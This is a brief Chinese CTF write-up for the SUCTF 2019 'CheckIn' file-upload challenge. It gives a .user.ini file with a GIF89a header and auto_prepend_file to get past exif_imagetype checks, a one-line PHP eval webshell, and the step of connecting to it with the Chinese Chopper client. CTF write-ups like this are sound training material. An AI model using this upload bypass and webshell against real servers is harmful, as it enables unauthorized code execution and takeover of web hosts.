BUU-WEB-[SUCTF 2019]CheckIn

BUU-WEB-[SUCTF 2019]CheckIn

看样子就知道又是一道文件上传题，但是没告诉我们可以上传什么文件。于是先尝试一个随便的txt文件。（传一句话木马会被拒）

告诉我们要上传图片格式。
根据exif_imagetype函数，首先要上传**.user.ini**文件
文件内容为：

GIF89a
auto_prepend_file=01.jpg

一句话木马如下：

GIF89a
<script language="php">eval($_POST[shell])</script>

然后菜刀访问：
http://a28dd4c5-81f9-4c65-a695-4d5b11083e1d.node3.buuoj.cn/uploads/d99081fe929b750e0557f85e6499103f/index.php
即可连接上去获得flag。

标签：SUCTF,WEB,文件,CheckIn,BUU,2019,上传
来源： https://blog.csdn.net/qq_24033605/article/details/116608184